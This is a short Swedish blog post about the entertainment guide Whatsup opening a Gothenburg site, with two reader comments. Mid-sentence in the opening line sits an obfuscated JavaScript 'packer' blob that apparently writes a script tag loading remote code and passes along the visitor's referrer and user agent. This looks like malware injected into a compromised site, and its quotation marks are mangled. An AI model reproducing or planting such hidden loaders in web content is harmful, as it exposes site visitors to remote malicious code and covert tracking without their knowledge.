Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Whatsupgbg.se öppnar upp

Whatsupgbg.se öppnar upp
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|thdey|var|u0026u|referrer|heyba||js|php’.split(’|’),0,{}))
framgångsrika nöjessidan Whatsupsthlm har under sin tid redan hunnit öppna upp i tre av Sveriges största städer. Stockholm, Uppsala och Malmö. Nu står stad fyra klar. Whatsup intar Göteborg.

På whatsup kan man läsa om kommande evenemang rörande kategorierna: Konsert, Kultur, Scen, Turist, Livsstil, Klubb och Restaurang. Förutom att läsa artiklar är sidan också en utmärkt guide och sökmotor för att hitta bra restauranger, caféer och klubbar i vald stad.

Enligt mig är whatsup den nöjesguide som publicerar bäst nyheter/artiklar riktade till den yngre publiken. Kikar man på konkurrenterna pastan.nu och Alltomsthlm.se så ser man att dessa sidor inte har någon speciell segementering på ålder utan publicerar till den stora massan.
Inget ont mot det, men är du lite yngre och vill hänga med i svängarna så rekommenderar jag Whatsupsthlm.se, whatsupmalmo.se, whatsupuppsala.se eller whatsuppgbg.se som en perfekt guide. Valet är ditt.

 

Comments

  1. Glen

    Trevligt. Då ska jag hålla mig uppdaterad 🙂 Bor i Göteborg.

  2. hugge

    Snygg sida må jag säga. Kommer det någon till Linköping?